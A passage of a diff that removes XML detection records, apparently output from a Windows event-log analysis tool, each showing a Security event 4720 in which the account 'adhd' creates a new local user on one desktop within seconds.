Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>James</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4747</recordid>
-            <time>2020-06-11 22:05:02.462460600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.4624606Z'/&gt;&lt;EventRecordID&gt;4747&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Thomas&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1117&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Thomas&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Thomas</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4741</recordid>
-            <time>2020-06-11 22:05:02.363556800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.3635568Z'/&gt;&lt;EventRecordID&gt;4741&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;William&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1116&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;William&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>William</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4735</recordid>
-            <time>2020-06-11 22:05:02.260673900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.2606739Z'/&gt;&lt;EventRecordID&gt;4735&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Carol&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1115&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Carol&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Carol</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4729</recordid>
-            <time>2020-06-11 22:05:02.187883800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.1878838Z'/&gt;&lt;EventRecordID&gt;4729&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Charles&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1114&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Charles&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Charles</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4723</recordid>
-            <time>2020-06-11 22:05:02.60882500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.0608825Z'/&gt;&lt;EventRecordID&gt;4723&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Joseph&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1113&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Joseph&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Joseph</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4717</recordid>
-            <time>2020-06-11 22:05:01.962210900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.9622109Z'/&gt;&lt;EventRecordID&gt;4717&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Benjamin&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1112&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Benjamin&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Benjamin</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4711</recordid>
-            <time>2020-06-11 22:05:01.885457000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.8854570Z'/&gt;&lt;EventRecordID&gt;4711&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Johnny&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1111&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Johnny&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Johnny</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4705</recordid>
-            <time>2020-06-11 22:05:01.800486500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.8004865Z'/&gt;&lt;EventRecordID&gt;4705&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Rose&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1110&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Rose&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Rose</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4699</recordid>
-            <time>2020-06-11 22:05:01.716740200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.7167402Z'/&gt;&lt;EventRecordID&gt;4699&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Judy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1109&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Judy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

